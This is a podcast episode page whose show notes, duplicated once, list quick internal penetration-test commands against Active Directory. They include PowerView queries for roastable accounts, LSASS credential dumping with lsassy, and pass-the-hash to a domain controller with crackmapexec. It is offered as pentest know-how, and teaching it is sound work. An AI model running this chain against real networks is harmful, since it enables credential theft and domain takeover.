7MS #457: Tales of Internal Network Pentest Pwnage - Part 25
7 Minute Security
English - March 04, 2021 17:57 - 31 minutes - 29 MB - ★★★★★ - 63 ratingsTechnology News Tech News information security security Homepage Download Apple Podcasts Google Podcasts Overcast Castro Pocket Casts RSS feed
Hi! This episode of pentest pwnage is a fun one because it was built for speeeeeeeeeeeeeeeed. Here's some of the things we're doing/running when time is of the essence:
Get a cmd.exe spun up in the context of your AD user account: runas /netonly /user:samplecompany\billybob "C:\windows\system32\cmd.exe"Then get some important info in PowerView:
Get-DomainUser -PreAuthNotRequired - find AD users with this flag set...then crack the hash for a (potentially) easy win!
Get-NetUser -spn - find Kerberoastable accounts...then crack the hash for a (potentially) easy win!
Find-LocalAdminAccess -Verbose helps you find where your general AD user has local admin access!
Once you know where you have local admin access, lsassy is your friend:
lsassy -d domain.com -u YOUR-USER -p YOUR-PASSWORD victim-serverDid you get an admin's NTLM hash from this dump? Then do this:
crackmapexec smb IP.OF.THE.DOMAINCONTROLLER -u ACCOUNT-YOU-DUMPED -H 'NTLM-HASH-OF-THAT-ACCOUNT-YOU-DUMPED(Pwn3d!) FTW!
Hi! This episode of pentest pwnage is a fun one because it was built for speeeeeeeeeeeeeeeed. Here's some of the things we're doing/running when time is of the essence:
Get a cmd.exe spun up in the context of your AD user account: runas /netonly /user:samplecompany\billybob "C:\windows\system32\cmd.exe"Then get some important info in PowerView:
Get-DomainUser -PreAuthNotRequired - find AD users with this flag set...then crack the hash for a (potentially) easy win!
Get-NetUser -spn - find Kerberoastable accounts...then crack the hash for a (potentially) easy win!
Find-LocalAdminAccess -Verbose helps you find where your general AD user has local admin access!
Once you know where you have local admin access, lsassy is your friend:
lsassy -d domain.com -u YOUR-USER -p YOUR-PASSWORD victim-serverDid you get an admin's NTLM hash from this dump? Then do this:
crackmapexec smb IP.OF.THE.DOMAINCONTROLLER -u ACCOUNT-YOU-DUMPED -H 'NTLM-HASH-OF-THAT-ACCOUNT-YOU-DUMPED(Pwn3d!) FTW!